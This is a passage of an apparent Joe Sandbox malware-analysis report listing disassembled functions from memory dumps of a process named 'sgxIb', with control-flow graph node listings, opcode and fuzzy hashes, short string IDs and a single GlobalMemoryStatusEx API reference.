                                              • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                              • API String ID: 0-1273862796
                                              • Opcode ID: 4d43e8d65736ede97ef34cf73f8c311e233264e20945f5af14dff7552af68702
                                              • Instruction ID: 5e798bbebb7284d34191cea361dfa3babff912d9057154f5f324c81c8c9d3e5a
                                              • Opcode Fuzzy Hash: 4d43e8d65736ede97ef34cf73f8c311e233264e20945f5af14dff7552af68702
                                              • Instruction Fuzzy Hash: BEE14A30E10209CFDB69DF69D5806AEB7B6EF89304F14952AE406AB358DB34DC46CB91
                                              Function 06DB9268 Relevance: 5.2, Strings: 4, Instructions: 231COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 255 6db9268-6db928d 256 6db928f-6db9292 255->256 257 6db92b8-6db92bb 256->257 258 6db9294-6db92b3 256->258 259 6db9b7b-6db9b7d 257->259 260 6db92c1-6db92d6 257->260 258->257 261 6db9b7f 259->261 262 6db9b84-6db9b87 259->262 266 6db92d8-6db92de 260->266 267 6db92ee-6db9304 260->267 261->262 262->256 265 6db9b8d-6db9b97 262->265 269 6db92e2-6db92e4 266->269 270 6db92e0 266->270 272 6db930f-6db9311 267->272 269->267 270->267 273 6db9329-6db939a 272->273 274 6db9313-6db9319 272->274 285 6db939c-6db93bf 273->285 286 6db93c6-6db93e2 273->286 275 6db931b 274->275 276 6db931d-6db931f 274->276 275->273 276->273 285->286 291 6db940e-6db9429 286->291 292 6db93e4-6db9407 286->292 297 6db942b-6db944d 291->297 298 6db9454-6db946f 291->298 292->291 297->298 303 6db949a-6db94a4 298->303 304 6db9471-6db9493 298->304 305 6db94a6-6db94af 303->305 306 6db94b4-6db952e 303->306 304->303 305->265 312 6db957b-6db9590 306->312 313 6db9530-6db954e 306->313 312->259 317 6db956a-6db9579 313->317 318 6db9550-6db955f 313->318 317->312 317->313 318->317
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q$$]q$$]q
                                              • API String ID: 0-858218434
                                              • Opcode ID: 08a67ba72c7f47c2887ea286151a314a7e48c04b0b6e3d4f0644eb7733baea33
                                              • Instruction ID: 7529c67c4964d54fc14326fc7afc0b5c5eb66d9aff8882f9393057a92a0864ab
                                              • Opcode Fuzzy Hash: 08a67ba72c7f47c2887ea286151a314a7e48c04b0b6e3d4f0644eb7733baea33
                                              • Instruction Fuzzy Hash: 01915030F0061A9FDB54DF69D9A07AE73F6FF85204F108569D50AEB388EA349C46CB91
                                              Function 06DBD070 Relevance: 4.5, Strings: 3, Instructions: 799COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 321 6dbd070-6dbd08b 322 6dbd08d-6dbd090 321->322 323 6dbd0d9-6dbd0dc 322->323 324 6dbd092-6dbd0a1 322->324 327 6dbd0de-6dbd120 323->327 328 6dbd125-6dbd128 323->328 325 6dbd0a3-6dbd0a8 324->325 326 6dbd0b0-6dbd0bc 324->326 325->326 329 6dbda8d-6dbdac6 326->329 330 6dbd0c2-6dbd0d4 326->330 327->328 331 6dbd12a-6dbd12c 328->331 332 6dbd137-6dbd13a 328->332 346 6dbdac8-6dbdacb 329->346 330->323 333 6dbd559 331->333 334 6dbd132 331->334 335 6dbd13c-6dbd141 332->335 336 6dbd144-6dbd147 332->336 341 6dbd55c-6dbd568 333->341 334->332 335->336 339 6dbd149-6dbd18b 336->339 340 6dbd190-6dbd193 336->340 339->340 343 6dbd1dc-6dbd1df 340->343 344 6dbd195-6dbd1d7 340->344 341->324 345 6dbd56e-6dbd85b 341->345 348 6dbd228-6dbd22b 343->348 349 6dbd1e1-6dbd223 343->349 344->343 534 6dbda82-6dbda8c 345->534 535 6dbd861-6dbd867 345->535 351 6dbdaee-6dbdaf1 346->351 352 6dbdacd-6dbdae9 346->352 358 6dbd22d-6dbd26f 348->358 359 6dbd274-6dbd277 348->359 349->348 355 6dbdaf3-6dbdb1f 351->355 356 6dbdb24-6dbdb27 351->356 352->351 355->356 362 6dbdb29 356->362 363 6dbdb36-6dbdb38 356->363 358->359 364 6dbd279-6dbd288 359->364 365 6dbd2c0-6dbd2c3 359->365 581 6dbdb29 call 6dbdbf8 362->581 582 6dbdb29 call 6dbdbe5 362->582 372 6dbdb3a 363->372 373 6dbdb3f-6dbdb42 363->373 375 6dbd28a-6dbd28f 364->375 376 6dbd297-6dbd2a3 364->376 370 6dbd2d2-6dbd2d5 365->370 371 6dbd2c5-6dbd2c7 365->371 384 6dbd2f2-6dbd2f5 370->384 385 6dbd2d7-6dbd2ed 370->385 382 6dbd2cd 371->382 383 6dbd417-6dbd420 371->383 372->373 373->346 380 6dbdb44-6dbdb53 373->380 375->376 376->329 381 6dbd2a9-6dbd2bb 376->381 379 6dbdb2f-6dbdb31 379->363 408 6dbdbba-6dbdbcf 380->408 409 6dbdb55-6dbdbb8 call 6db66b8 380->409 381->365 382->370 389 6dbd42f-6dbd43b 383->389 390 6dbd422-6dbd427 383->390 393 6dbd33e-6dbd341 384->393 394 6dbd2f7-6dbd339 384->394 385->384 398 6dbd54c-6dbd551 389->398 399 6dbd441-6dbd455 389->399 390->389 396 6dbd343-6dbd35f 393->396 397 6dbd364-6dbd367 393->397 394->393 396->397 397->341 406 6dbd36d-6dbd370 397->406 398->333 399->333 423 6dbd45b-6dbd46d 399->423 414 6dbd3b9-6dbd3bc 406->414 415 6dbd372-6dbd3b4 406->415 428 6dbdbd0 408->428 409->408 426 6dbd3be-6dbd400 414->426 427 6dbd405-6dbd407 414->427 415->414 442 6dbd46f-6dbd475 423->442 443 6dbd491-6dbd493 423->443 426->427 429 6dbd409 427->429 430 6dbd40e-6dbd411 427->430 428->428 429->430 430->322 430->383 446 6dbd479-6dbd485 442->446 447 6dbd477 442->447 452 6dbd49d-6dbd4a9 443->452 451 6dbd487-6dbd48f 446->451 447->451 451->452 461 6dbd4ab-6dbd4b5 452->461 462 6dbd4b7 452->462 466 6dbd4bc-6dbd4be 461->466 462->466 466->333 468 6dbd4c4-6dbd4e0 call 6db66b8 466->468 479 6dbd4ef-6dbd4fb 468->479 480 6dbd4e2-6dbd4e7 468->480 479->398 481 6dbd4fd-6dbd54a 479->481 480->479 481->333 536 6dbd869-6dbd86e 535->536 537 6dbd876-6dbd87f 535->537 536->537 537->329 538 6dbd885-6dbd898 537->538 540 6dbd89e-6dbd8a4 538->540 541 6dbda72-6dbda7c 538->541 542 6dbd8b3-6dbd8bc 540->542 543 6dbd8a6-6dbd8ab 540->543 541->534 541->535 542->329 544 6dbd8c2-6dbd8e3 542->544 543->542 547 6dbd8f2-6dbd8fb 544->547 548 6dbd8e5-6dbd8ea 544->548 547->329 549 6dbd901-6dbd91e 547->549 548->547 549->541 552 6dbd924-6dbd92a 549->552 552->329 553 6dbd930-6dbd949 552->553 555 6dbd94f-6dbd976 553->555 556 6dbda65-6dbda6c 553->556 555->329 559 6dbd97c-6dbd986 555->559 556->541 556->552 559->329 560 6dbd98c-6dbd9a3 559->560 562 6dbd9b2-6dbd9cd 560->562 563 6dbd9a5-6dbd9b0 560->563 562->556 568 6dbd9d3-6dbd9ec call 6db66b8 562->568 563->562 572 6dbd9fb-6dbda04 568->572 573 6dbd9ee-6dbd9f3 568->573 572->329 574 6dbda0a-6dbda5e 572->574 573->572 574->556 581->379 582->379
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q$$]q
                                              • API String ID: 0-182748909
                                              • Opcode ID: 689ebf02370d0ce47ffe8f492c3de1aa88f0fe6b14551a0db7c7b0f2c18ffad1
                                              • Instruction ID: 0313f41ebdda6c83d8e8b8fb68846b38e574ef4158e0135d3d697ba2aaff20a1
                                              • Opcode Fuzzy Hash: 689ebf02370d0ce47ffe8f492c3de1aa88f0fe6b14551a0db7c7b0f2c18ffad1
                                              • Instruction Fuzzy Hash: 63622F746006068FCB55EF68D680A9EB7F6FF84304B208A79D0069F359DB79ED46CB81
                                              Function 07492148 Relevance: 4.1, Strings: 3, Instructions: 348COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 583 7492148-749216d 584 7492173-7492175 583->584 585 74922c2-74922e6 583->585 586 749217b-7492184 584->586 587 74922ed-7492372 584->587 585->587 589 7492197-74921be 586->589 590 7492186-7492194 586->590 620 7492378-749238b 587->620 621 7492433 587->621 593 7492248-749224c 589->593 594 74921c4-74921d7 call 7491e34 589->594 590->589 595 749224e-749227b call 7491e44 593->595 596 7492283-749229c 593->596 594->593 609 74921d9-749222c 594->609 612 7492280 595->612 604 749229e 596->604 605 74922a6 596->605 604->605 605->585 609->593 614 749222e-7492241 609->614 612->596 614->593 620->621 626 7492391-749239d 620->626 623 7492438-7492443 621->623 627 749244a-7492473 623->627 626->623 629 74923a3-74923ce 626->629 631 749247f-7492554 627->631 632 7492475-749247e 627->632 629->621 639 74923d0-74923dc 629->639 653 749255a-7492568 631->653 641 7492428-7492432 639->641 642 74923de-74923e1 639->642 643 74923e4-74923ed 642->643 643->627 645 74923ef-749240a 643->645 647 749240c-749240e 645->647 648 7492412-7492415 645->648 647->621 650 7492410 647->650 648->621 649 7492417-7492426 648->649 649->641 649->643 650->649 654 749256a-7492570 653->654 655 7492571-74925a9 653->655 654->655 659 74925b9 655->659 660 74925ab-74925af 655->660 662 74925ba 659->662 660->659 661 74925b1 660->661 661->659 662->662
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4514673446.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_7490000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (aq$(aq$(aq
                                              • API String ID: 0-2593664646
                                              • Opcode ID: f5d9d1ce10c79236d7ed5a08a41c9d133e10e95a80eae8a8f39f0997761a0d80
                                              • Instruction ID: 9e73e50ca59f22e1a8bf16cf460304d1c2c40b49f2fd636f944f4259e902dbc2
                                              • Opcode Fuzzy Hash: f5d9d1ce10c79236d7ed5a08a41c9d133e10e95a80eae8a8f39f0997761a0d80
                                              • Instruction Fuzzy Hash: 0CD17AB0E0021A9FCF14DFA9C8546EEBFF2BF89310F14856AD405AB391DB74A941CB91
                                              Function 06DB4C80 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 663 6db4c80-6db4ca4 664 6db4ca6-6db4ca9 663->664 665 6db4cab-6db4cc5 664->665 666 6db4cca-6db4ccd 664->666 665->666 667 6db53ac-6db53ae 666->667 668 6db4cd3-6db4dcb 666->668 669 6db53b0 667->669 670 6db53b5-6db53b8 667->670 686 6db4e4e-6db4e55 668->686 687 6db4dd1-6db4e19 668->687 669->670 670->664 672 6db53be-6db53cb 670->672 688 6db4e5b-6db4ecb 686->688 689 6db4ed9-6db4ee2 686->689 708 6db4e1e call 6db5529 687->708 709 6db4e1e call 6db5538 687->709 706 6db4ecd 688->706 707 6db4ed6 688->707 689->672 700 6db4e24-6db4e40 703 6db4e4b 700->703 704 6db4e42 700->704 703->686 704->703 706->707 707->689 708->700 709->700
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: fbq$XPbq$\Obq
                                              • API String ID: 0-4057264190
                                              • Opcode ID: d41a5abe63b63fffe522f26bb7e0c596fb2f555bdf49d4b5f30ade2835423c91
                                              • Instruction ID: e18135eed4a39f04c61e8683eb81ccbda789e00609326db699ba188d879df3fa
                                              • Opcode Fuzzy Hash: d41a5abe63b63fffe522f26bb7e0c596fb2f555bdf49d4b5f30ade2835423c91
                                              • Instruction Fuzzy Hash: 6561A030F00219DFEB54DFA9C8547AEBBF6FB88704F208429E106AB395DB759C018B91
                                              Function 06DB925A Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1472 6db925a-6db928d 1474 6db928f-6db9292 1472->1474 1475 6db92b8-6db92bb 1474->1475 1476 6db9294-6db92b3 1474->1476 1477 6db9b7b-6db9b7d 1475->1477 1478 6db92c1-6db92d6 1475->1478 1476->1475 1479 6db9b7f 1477->1479 1480 6db9b84-6db9b87 1477->1480 1484 6db92d8-6db92de 1478->1484 1485 6db92ee-6db9304 1478->1485 1479->1480 1480->1474 1483 6db9b8d-6db9b97 1480->1483 1487 6db92e2-6db92e4 1484->1487 1488 6db92e0 1484->1488 1490 6db930f-6db9311 1485->1490 1487->1485 1488->1485 1491 6db9329-6db939a 1490->1491 1492 6db9313-6db9319 1490->1492 1503 6db939c-6db93bf 1491->1503 1504 6db93c6-6db93e2 1491->1504 1493 6db931b 1492->1493 1494 6db931d-6db931f 1492->1494 1493->1491 1494->1491 1503->1504 1509 6db940e-6db9429 1504->1509 1510 6db93e4-6db9407 1504->1510 1515 6db942b-6db944d 1509->1515 1516 6db9454-6db946f 1509->1516 1510->1509 1515->1516 1521 6db949a-6db94a4 1516->1521 1522 6db9471-6db9493 1516->1522 1523 6db94a6-6db94af 1521->1523 1524 6db94b4-6db952e 1521->1524 1522->1521 1523->1483 1530 6db957b-6db9590 1524->1530 1531 6db9530-6db954e 1524->1531 1530->1477 1535 6db956a-6db9579 1531->1535 1536 6db9550-6db955f 1531->1536 1535->1530 1535->1531 1536->1535
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q
                                              • API String ID: 0-127220927
                                              • Opcode ID: d05b506c47107a1655a2d87c4ce6922e547fc00e42e81454a5eb7df87076e1a6
                                              • Instruction ID: 55d7cd3b0bf44a3ea26fdf2bcfd36e1645edfdc27939a2a2c3c85055f441ef98
                                              • Opcode Fuzzy Hash: d05b506c47107a1655a2d87c4ce6922e547fc00e42e81454a5eb7df87076e1a6
                                              • Instruction Fuzzy Hash: D0514131F006059FDB54DB68D9A0BAE77F6FB89204F108529D51AEB398DA34DC06CB91
                                              Function 06DB4C71 Relevance: 2.6, Strings: 2, Instructions: 140COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1539 6db4c71-6db4ca4 1541 6db4ca6-6db4ca9 1539->1541 1542 6db4cab-6db4cc5 1541->1542 1543 6db4cca-6db4ccd 1541->1543 1542->1543 1544 6db53ac-6db53ae 1543->1544 1545 6db4cd3-6db4dcb 1543->1545 1546 6db53b0 1544->1546 1547 6db53b5-6db53b8 1544->1547 1563 6db4e4e-6db4e55 1545->1563 1564 6db4dd1-6db4e19 1545->1564 1546->1547 1547->1541 1549 6db53be-6db53cb 1547->1549 1565 6db4e5b-6db4ecb 1563->1565 1566 6db4ed9-6db4ee2 1563->1566 1585 6db4e1e call 6db5529 1564->1585 1586 6db4e1e call 6db5538 1564->1586 1583 6db4ecd 1565->1583 1584 6db4ed6 1565->1584 1566->1549 1577 6db4e24-6db4e40 1580 6db4e4b 1577->1580 1581 6db4e42 1577->1581 1580->1563 1581->1580 1583->1584 1584->1566 1585->1577 1586->1577
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: fbq$XPbq
                                              • API String ID: 0-2292610095
                                              • Opcode ID: 31cf2cf762915c71265535374229ea74e6b90b4cbf6fffb0aba95144800d1fd7
                                              • Instruction ID: 1ff7be1c4ebc6f8b628b5dee40b8e708a7b1aeae041db0cf1dd16d31dc068fd0
                                              • Opcode Fuzzy Hash: 31cf2cf762915c71265535374229ea74e6b90b4cbf6fffb0aba95144800d1fd7
                                              • Instruction Fuzzy Hash: 05519130F002199FEB54DFA9C8557AEBBF6FF88704F208529D106AB395DA759C01CB91
                                              Function 013CED80 Relevance: 1.6, APIs: 1, Instructions: 130COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1768 13ced80-13ced8b 1769 13ced8d-13cedb4 1768->1769 1770 13cedb5-13cedcb 1768->1770 1794 13cedcd call 13cee58 1770->1794 1795 13cedcd call 13ced70 1770->1795 1796 13cedcd call 13ced80 1770->1796 1797 13cedcd call 13cee20 1770->1797 1798 13cedcd call 13cee50 1770->1798 1773 13cedd2-13cedd4 1774 13cedda-13cee0f 1773->1774 1775 13cedd6-13cedd9 1773->1775 1780 13cee10-13cee39 1774->1780 1784 13cee3f-13cee54 1780->1784 1785 13cee3b-13cee3e 1780->1785 1784->1780 1787 13cee56-13ceecc GlobalMemoryStatusEx 1784->1787 1790 13ceece-13ceed4 1787->1790 1791 13ceed5-13ceefd 1787->1791 1790->1791 1794->1773 1795->1773 1796->1773 1797->1773 1798->1773
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4491320890.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_13c0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0c0460011847ce53ebb9f03ae14bf3b496c36a1864dba0be97d16d7fe006b2b8
                                              • Instruction ID: 73b78a91cd3094c7c28813aeaa240dcea337e319bb1b58382da6d631f7e20b72
                                              • Opcode Fuzzy Hash: 0c0460011847ce53ebb9f03ae14bf3b496c36a1864dba0be97d16d7fe006b2b8
                                              • Instruction Fuzzy Hash: D3412372D043598FCB04DFB9D8042DEBFF1EF89210F15866AD408A7641DB74A845CBE1
                                              Function 013CEE58 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1814 13cee58-13ceecc GlobalMemoryStatusEx 1817 13ceece-13ceed4 1814->1817 1818 13ceed5-13ceefd 1814->1818 1817->1818
                                              APIs
                                              • GlobalMemoryStatusEx.KERNEL32 ref: 013CEEBF
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4491320890.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_13c0000_sgxIb.jbxd
                                              Similarity
                                              • API ID: GlobalMemoryStatus
                                              • String ID:
                                              • API String ID: 1890195054-0
                                              • Opcode ID: df97b97f56a1947a45b6d447cf888032eca11de0e74e85b0734a92bc664a51e7
                                              • Instruction ID: a8162e2e88d7eefd5c3ba279c4959e0c2cf493649e21f990b6f629e7ce5f7a12
                                              • Opcode Fuzzy Hash: df97b97f56a1947a45b6d447cf888032eca11de0e74e85b0734a92bc664a51e7
                                              • Instruction Fuzzy Hash: F9111FB1C006599BCB10DFAAC444B9EFBF8AF48320F10812AD818A7240D778A944CFA5
                                              Function 013CEE50 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1799 13cee50-13cee54 1800 13cee56-13ceecc GlobalMemoryStatusEx 1799->1800 1801 13cee10-13cee39 1799->1801 1806 13ceece-13ceed4 1800->1806 1807 13ceed5-13ceefd 1800->1807 1809 13cee3f-13cee54 1801->1809 1810 13cee3b-13cee3e 1801->1810 1806->1807 1809->1800 1809->1801
                                              APIs
                                              • GlobalMemoryStatusEx.KERNEL32 ref: 013CEEBF
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4491320890.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_13c0000_sgxIb.jbxd
                                              Similarity
                                              • API ID: GlobalMemoryStatus
                                              • String ID:
                                              • API String ID: 1890195054-0
                                              • Opcode ID: 358bc4fa9d155d462431bd24e47bc1baeedc44821cee0eed79191dfe7bbda8b7
                                              • Instruction ID: e9333308a1460261bad71f01548edc6bd7d8b6899823fc16cac7b9eb686112f4
                                              • Opcode Fuzzy Hash: 358bc4fa9d155d462431bd24e47bc1baeedc44821cee0eed79191dfe7bbda8b7
                                              • Instruction Fuzzy Hash: 3B1120B5C0065A9BCB10DFAAC4447AEFBF5BF08724F10852AD818B7241D378A944CFE5
                                              Function 06DBDBF8 Relevance: 1.4, Strings: 1, Instructions: 117COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PH]q
                                              • API String ID: 0-3168235125
                                              • Opcode ID: 97509d9bfd1070bfe4d1dc7776f0775943302baa0bfea3147d8ba5fa659cdc9c
                                              • Instruction ID: 17ea9a83d7cab74ffe7ebc9f9160951bddcd40ade492e5cd750c6344fe1a225d
                                              • Opcode Fuzzy Hash: 97509d9bfd1070bfe4d1dc7776f0775943302baa0bfea3147d8ba5fa659cdc9c
                                              • Instruction Fuzzy Hash: C1418070E0060ADFDB64DF65D45469EBBB6FF85304F208529E406E7248DBB4E94ACB81
                                              Function 06DBDBE5 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PH]q
                                              • API String ID: 0-3168235125
                                              • Opcode ID: 48c8697ed61733b4c4d8fd22aca222fcd75ea8c3ae4da15dfbe3e2d1a389c979
                                              • Instruction ID: 249daf428554d229caf8453660793e7d52e8c2c95c8dbd9e45636a89d083f4bc
                                              • Opcode Fuzzy Hash: 48c8697ed61733b4c4d8fd22aca222fcd75ea8c3ae4da15dfbe3e2d1a389c979
                                              • Instruction Fuzzy Hash: 8541A130E00705DFDB649F65D45469EBBB6FF89300F109529E446EB248DBB4E80ACB41
                                              Function 06DB21BD Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PH]q
                                              • API String ID: 0-3168235125
                                              • Opcode ID: 9dc50d901749e3acf2521e71d1489dc74b1c8d9418c5e52e2b1d73f79f3c6e0a
                                              • Instruction ID: d3662fe09c4c2c1690f6960ed44d9bced6c7eb10340d1f9807e7e4692edb6a13
                                              • Opcode Fuzzy Hash: 9dc50d901749e3acf2521e71d1489dc74b1c8d9418c5e52e2b1d73f79f3c6e0a
                                              • Instruction Fuzzy Hash: 7D31FE31B10202DFDB699B74D554AAE3BE6AF89304F108538D007DB399DE39DE06CBA1
                                              Function 06DB21D0 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PH]q
                                              • API String ID: 0-3168235125
                                              • Opcode ID: 3b01559a21e341abafcd8c5f8bb5e1d6c33df746af51b02bf0d2aba5422b8647
                                              • Instruction ID: 9b63a73dad13351b8abef26036368773a886934f57a994c622544dceeabc0522
                                              • Opcode Fuzzy Hash: 3b01559a21e341abafcd8c5f8bb5e1d6c33df746af51b02bf0d2aba5422b8647
                                              • Instruction Fuzzy Hash: DA31DE31B10201DFDB689B74D5546AE3BE6AFC9304F108438D406DB398DE39DE06CBA5
                                              Function 06DB83E8 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q
                                              • API String ID: 0-1007455737
                                              • Opcode ID: 832e0f9f8250fd6e58696968b108f9ceb5aa152f8bbdfc98e3dbf83c5bcf850c
                                              • Instruction ID: 22381482dc8a90d0101543fdaf4a12992909f838f71a6ba91741ccb4e2a5f566
                                              • Opcode Fuzzy Hash: 832e0f9f8250fd6e58696968b108f9ceb5aa152f8bbdfc98e3dbf83c5bcf850c
                                              • Instruction Fuzzy Hash: A9F0DC31B00105CFDF688F58EA806E877AEEB88204F045576C906DB258CB2AD906EB91
                                              Function 06DB4B69 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \Obq
                                              • API String ID: 0-2878401908
                                              • Opcode ID: 78b42e9a0c582b4f3cfc1dd8df0dfc775710c4104086915f2ab3fa541886f6ba
                                              • Instruction ID: 20a9aaecdd5d81ea54902cb4ebf29865fed0b0213716b9def3547250f716dc08
                                              • Opcode Fuzzy Hash: 78b42e9a0c582b4f3cfc1dd8df0dfc775710c4104086915f2ab3fa541886f6ba
                                              • Instruction Fuzzy Hash: D0F0DA31A60129DBDB24DF95E959BAEBBF2FF88705F204519E102A7298CBB05C01CF80
                                              Function 06DBC2B0 Relevance: .6, Instructions: 634COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fc3f07024db1114611d8b9169478f55b9a3ec46ef4cdc43ffa6708579ec59a1d
                                              • Instruction ID: 97b496c56d3c76c2e49ddda2ec595b2ffcc80a395525d95e2c3db744e5cbdf63
                                              • Opcode Fuzzy Hash: fc3f07024db1114611d8b9169478f55b9a3ec46ef4cdc43ffa6708579ec59a1d
                                              • Instruction Fuzzy Hash: 62326D34B10209CFDB54DF68D990AAEB7B6FB88314F109529E406E7359DB39EC42CB91
                                              Function 06DBB3E7 Relevance: .6, Instructions: 558COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f8e8dc2c75fc1bbfb85c078c010c78601ec0494e978825832ac9bf2d09dfc6bf
                                              • Instruction ID: 75112894dde0f2cfb38710bc64f880420eab3fd9002f3213b65a75c8cfade283
                                              • Opcode Fuzzy Hash: f8e8dc2c75fc1bbfb85c078c010c78601ec0494e978825832ac9bf2d09dfc6bf
                                              • Instruction Fuzzy Hash: FF224D34E10209CFDF64CF68D584BADB7B5EB89314F209426E406EB399DA38DC81CB51
                                              Function 06DB6308 Relevance: .2, Instructions: 229COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
